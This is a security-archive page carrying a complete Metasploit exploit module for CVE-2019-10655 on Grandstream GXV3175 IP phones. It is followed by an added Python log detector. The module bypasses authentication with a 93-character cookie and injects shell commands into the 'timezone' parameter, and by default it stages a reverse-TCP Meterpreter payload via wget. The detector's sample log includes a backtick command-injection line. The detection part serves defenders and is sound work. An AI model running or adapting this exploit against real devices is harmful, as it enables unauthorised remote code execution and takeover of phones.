
Grandstream GXV3175 Unauthenticated Command Execution

🗓️ 20 Jan 2022 00:00:00 · Reported by Brendan Coles, alhazred, Brendan Scarvell, metasploit.com · Type: packetstorm · 🔗 packetstormsecurity.com

Grandstream IP phone command injection vulnerability

Code
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  HttpFingerprint = { pattern: [ /Multimedia Phone/ ] }.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "Grandstream GXV3175 'settimezone' Unauthenticated Command Execution",
        'Description' => %q{
          This module exploits a command injection vulnerability in Grandstream GXV3175
          IP multimedia phones. The 'settimezone' action does not validate input in the
          'timezone' parameter allowing injection of arbitrary commands.

          A buffer overflow in the 'phonecookie' cookie parsing allows authentication
          to be bypassed by providing an alphanumeric cookie 93 characters in length.

          This module was tested successfully on Grandstream GXV3175v2
          hardware revision V2.6A with firmware version 1.0.1.19.
        },
        'Author' => [
          'alhazred', # Command injection vulnerability discovery and exploit
          'Brendan Scarvell', # Auth bypass discovery
          'bcoles' # Metasploit
        ],
        'License' => MSF_LICENSE,
        'Platform' => 'linux',
        'References' => [
          [ 'CVE', '2019-10655' ],
          [ 'URL', 'https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=23920' ],
          [ 'URL', 'https://github.com/dirtyfilthy/gxv3175-remote-code-exec/blob/master/modules/exploits/linux/http/grandstream_gxv3175_cmd_exec.rb' ]
        ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        },
        'DisclosureDate' => '2016-09-01',
        'Privileged' => true,
        'Arch' => ARCH_ARMLE,
        'DefaultOptions' => {
          'PrependFork' => true,
          'MeterpreterTryToFork' => true,
          'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp',
          'CMDSTAGER::FLAVOR' => 'wget'
        },
        'CmdStagerFlavor' => %w[wget],
        'Targets' => [
          ['Automatic', {}]
        ],
        'DefaultTarget' => 0
      )
    )
  end

  def check
    res = send_request_cgi(
      'uri' => '/manager',
      'cookie' => "phonecookie=\"#{rand_text_alpha(93)}\"",
      'vars_get' => {
        'action' => 'settimezone',
        'timezone' => ''
      }
    )

    if res && res.code == 200 && res.body.to_s.include?('Response=Success')
      return CheckCode::Detected('phonecookie authentication bypassed successfully.')
    end

    CheckCode::Safe
  end

  def execute_command(cmd, _opts)
    res = send_request_cgi(
      'uri' => '/manager',
      'cookie' => "phonecookie=\"#{rand_text_alpha(93)}\"",
      'vars_get' => {
        'action' => 'settimezone',
        'timezone' => "`#{cmd}`"
      }
    )
    unless res
      fail_with(Failure::Unreachable, 'Connection failed')
    end
    unless res.code == 200
      fail_with(Failure::UnexpectedReply, "Unexpected reply (HTTP #{res.code})")
    end
    unless res.body.to_s.include?('Response=Success')
      fail_with(Failure::UnexpectedReply, "Unexpected reply (#{res.body.length} bytes)")
    end
  end

  def exploit
    execute_cmdstager(
      linemax: 220, # 255 minus URL encoding
      background: true
    )
  end
end
```
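The module's notes flag IOC_IN_LOGS, and both of its request features are visible to anyone logging HTTP traffic in front of the phone: a GET to `/manager` with `action=settimezone` whose `timezone` value carries shell metacharacters, and a `phonecookie` value of 93 alphanumeric characters. The following detector is an added example written for this page, not part of the Metasploit module or of Vulners. It assumes a constructed access-log layout (combined format plus the request's Cookie header as a final quoted field, inner quotes escaped as `\"`); the sample lines are constructed, and the 93-character threshold and the `/manager` request shape come from the module description above.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumed log layout (constructed for this example): combined access-log fields
# followed by the request's Cookie header as a final quoted field, with any
# embedded double quotes escaped as \".
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ '
    r'"(?P<cookie>(?:[^"\\]|\\.)*)"$'
)

# Characters that have no business in a timezone name but do in a shell command.
SHELL_META = re.compile(r'[`;|&]|\$\(')
PHONECOOKIE = re.compile(r'phonecookie=(?P<value>[^;]*)')
BYPASS_COOKIE_LEN = 93  # cookie length named in the module description


def analyze_line(line):
    """Return a list of finding strings for one log line; [] when nothing matched."""
    m = LOG_RE.match(line.rstrip('\n'))
    if not m:
        return []
    findings = []
    url = urlsplit(m['target'])
    if url.path != '/manager':
        return findings

    # parse_qs percent-decodes, so %60 (backtick) becomes visible to SHELL_META.
    params = parse_qs(url.query, keep_blank_values=True)
    if params.get('action') == ['settimezone']:
        for tz in params.get('timezone', []):
            if SHELL_META.search(tz):
                findings.append(
                    f"settimezone command injection attempt from {m['src']}: timezone={tz!r}"
                )

    cookie = m['cookie'].replace('\\"', '"')
    pc = PHONECOOKIE.search(cookie)
    if pc:
        value = pc['value'].strip().strip('"')
        if len(value) >= BYPASS_COOKIE_LEN and value.isalnum():
            findings.append(
                f"oversized phonecookie ({len(value)} chars) from {m['src']}: possible auth bypass"
            )
    return findings


def scan(lines):
    """Run analyze_line over an iterable of log lines and return all findings."""
    return [f for line in lines for f in analyze_line(line)]


# Constructed sample log lines (not taken from any real device).
SAMPLE_LOG = [
    # benign timezone change with a short session cookie
    '192.0.2.20 - - [20/Jan/2022:09:00:00 +0000] '
    '"GET /manager?action=settimezone&timezone=UTC HTTP/1.1" 200 17 '
    '"phonecookie=\\"abc123\\""',
    # backtick-wrapped command in the timezone parameter plus a 93-char cookie
    '198.51.100.7 - - [20/Jan/2022:09:05:12 +0000] '
    '"GET /manager?action=settimezone&timezone=%60id%60 HTTP/1.1" 200 17 '
    '"phonecookie=\\"' + 'A' * 93 + '\\""',
    # unrelated request
    '192.0.2.21 - - [20/Jan/2022:09:06:00 +0000] '
    '"GET /index.html HTTP/1.1" 200 512 "-"',
]

if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The two checks are deliberately independent: the cookie check fires on its own because the bypass is the precondition for the injection, so an oversized cookie without metacharacters may still be an attacker probing with the `check` method (which sends an empty `timezone`). Run against a real log only after adjusting `LOG_RE` to the layout your proxy or phone actually writes.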
